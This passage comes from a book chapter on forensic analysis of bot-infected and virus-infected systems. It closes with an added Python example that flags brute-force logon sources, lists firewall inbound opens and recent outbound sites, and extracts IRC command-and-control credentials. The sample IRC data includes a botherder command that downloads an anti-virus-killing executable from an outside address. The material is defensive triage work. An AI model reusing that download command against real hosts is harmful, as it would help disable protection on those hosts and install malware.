Chapter 9 · Forensic Analysis

environment that will interpret the contents of index.dat files to reveal Internet access history and cookies even if the user has deleted the history and cache.

Collecting Intelligence about Botnets or Virus-Infected Systems

Using virtualization to execute the code on a suspected bot client or virus-infected system permits the investigator to gather valuable insights about the workings of malicious code. From the security event log you can see any attempts to guess passwords by brute force, and the identity of the other bot clients that took part in those attacks. From the firewall logs you can see any inbound connections that were accepted (inbound opens), and by looking at the firewall entries around the time of the malware detection you can learn the identity of the websites that delivered the malicious code. Watching network traffic from the suspect computer, you can identify the ports opened by the malicious code and the IP addresses of other parts of the botnet. These other parts of the botnet may be providing further malicious code, such as retroviruses that kill off your anti-virus protection, or lists of email addresses and spam templates. If the bot client uses Internet Relay Chat (IRC), you may find the command and control server, the nick, the userid, and the password. You can then use this information to detect other infected computers in your organization and to block future communications with the botnet's command and control server (the "mother ship").

Locating the actual malware is a primary goal of a forensic examination of a bot client or virus-infected computer. Chapter 6, "Malware Analysis," describes the process of running code samples in a sandbox to perform malware analysis.

Collecting Intelligence about a Case

When investigators gather evidence, they must ensure that no unexplained changes occur to the suspect's computer. If the goal of the examination is to gather intelligence rather than evidence, the VM can be used without restraint, because the results do not have to meet evidentiary standards. The investigator must still take pains to ensure that information gathered during an intelligence-gathering run does not mix with information gathered as evidence. In these circumstances the investigator can use intuition and even hearsay to suggest keywords for searches or settings to examine on the suspect's computer, using the VM to check out "what if?" scenarios. The intelligence may then point to a set of information that can be gathered in a traditional manner and used as evidence.
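The event-log, firewall-log and IRC triage described in the section above, as an added example (Python, not code from the book or its authors): it flags brute-force sources in a security-log export, lists the inbound opens and the sites contacted in the minutes before a detection from a Windows Firewall log, and pulls the command and control server, nick, userid, password and channel key out of a reassembled IRC session. All log lines are constructed for the example; the security-log layout is a simplified export of my own, the firewall lines follow the first eight fields of the pfirewall.log layout, and the IRC stream uses a ">" / "<" direction prefix that is an assumption of the example rather than any capture tool's format.

```python
# Added example: triage helpers for a suspected bot client. All data below is
# constructed for illustration and the log layouts are simplified.
from collections import defaultdict
from datetime import datetime, timedelta

# Failed logons: date time event-id account source-ip (529 on XP/2003, 4625 on Vista+).
SECURITY_LOG = """\
2007-03-14 02:11:03 529 administrator 10.0.0.17
2007-03-14 02:11:04 529 administrator 10.0.0.17
2007-03-14 02:11:04 529 admin 10.0.0.17
2007-03-14 02:11:05 529 root 10.0.0.17
2007-03-14 02:11:06 529 guest 10.0.0.17
2007-03-14 02:40:11 529 jsmith 10.0.0.23
2007-03-14 02:55:00 529 administrator 10.0.0.41
2007-03-14 02:55:01 529 administrator 10.0.0.41
2007-03-14 02:55:01 529 test 10.0.0.41
2007-03-14 02:55:02 529 sql 10.0.0.41
2007-03-14 02:55:02 529 backup 10.0.0.41
"""

# Windows Firewall (pfirewall.log) lines, first eight fields only; the suspect
# host is 10.0.0.5 and OPEN-INBOUND marks a connection it accepted from outside.
FIREWALL_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port
2007-03-14 02:05:10 OPEN TCP 10.0.0.5 192.0.2.44 1043 80
2007-03-14 02:08:31 OPEN TCP 10.0.0.5 198.51.100.9 1044 6667
2007-03-14 02:09:02 OPEN TCP 10.0.0.5 203.0.113.77 1045 80
2007-03-14 02:09:20 OPEN-INBOUND TCP 10.0.0.17 10.0.0.5 3391 445
"""

# IRC session reassembled from a capture: ">" is bot to server, "<" server to bot.
IRC_STREAM = """\
> PASS s3cr3tbot
> NICK [USA|XP]4921
> USER xp 0 * :xp
< :irc.example.net 001 [USA|XP]4921 :Welcome
> JOIN #ddos botk3y
< :master!m@host PRIVMSG #ddos :.download http://203.0.113.77/kill_av.exe c:\\av.exe 1
"""

def _ts(date, time):
    return datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")

def brute_force_sources(log_text, threshold=5, window=timedelta(minutes=2)):
    """{source_ip: (failures, accounts)} for sources with >= threshold failures in one window."""
    times, accounts = defaultdict(list), defaultdict(set)
    for line in log_text.splitlines():
        date, time, event_id, account, src = line.split()
        if event_id in ("529", "4625"):
            times[src].append(_ts(date, time))
            accounts[src].add(account)
    hits = {}
    for src, ts in times.items():
        ts.sort()
        start = 0
        for end in range(len(ts)):  # sliding window over the sorted timestamps
            while ts[end] - ts[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                hits[src] = (len(ts), sorted(accounts[src]))
                break
    return hits

def _fw_records(fw_text):
    for line in fw_text.splitlines():
        if line and not line.startswith("#"):
            yield line.split()[:8]

def inbound_opens(fw_text):
    """(remote IP, local port) for each inbound connection the host accepted."""
    return [(src, int(dport)) for _, _, action, _, src, _, _, dport
            in _fw_records(fw_text) if action == "OPEN-INBOUND"]

def sites_before_detection(fw_text, detected_at, lookback=timedelta(minutes=10)):
    """Outbound opens in the lookback before detected_at ("YYYY-MM-DD HH:MM:SS"), oldest first."""
    end = _ts(*detected_at.split())
    hits = [(_ts(d, t), f"{dst}:{dport}")
            for d, t, action, _, _, dst, _, dport in _fw_records(fw_text)
            if action == "OPEN" and end - lookback <= _ts(d, t) <= end]
    return [site for _, site in sorted(hits)]

def irc_session_details(stream_text):
    """C&C server, nick, userid, password, channels (with keys) and botherder commands."""
    info = {"server": None, "nick": None, "user": None, "password": None,
            "channels": {}, "commands": []}
    field = {"PASS": "password", "NICK": "nick", "USER": "user"}
    for raw in stream_text.splitlines():
        direction, _, line = raw.partition(" ")
        parts = line.split()
        if direction == ">":  # bot registering with the server
            cmd, args = parts[0].upper(), parts[1:]
            if cmd in field:
                info[field[cmd]] = args[0]
            elif cmd == "JOIN":  # channel name, optional channel key
                info["channels"][args[0]] = args[1] if len(args) > 1 else None
        elif len(parts) > 1 and parts[1] == "001":  # welcome reply names the server
            info["server"] = parts[0].lstrip(":")
        elif len(parts) > 3 and parts[1] == "PRIVMSG":  # trailing parameter is the command
            info["commands"].append(line.split(" :", 1)[1])
    return info
```

To use it on a real case, replace the three constants with the exported logs and the reassembled IRC stream. The sources flagged by brute_force_sources are candidates for the same examination, the inbound open from the same address ties the two logs together, and the server, nick, password and channel key from irc_session_details give you the strings to search for on other hosts and the address to block at the perimeter.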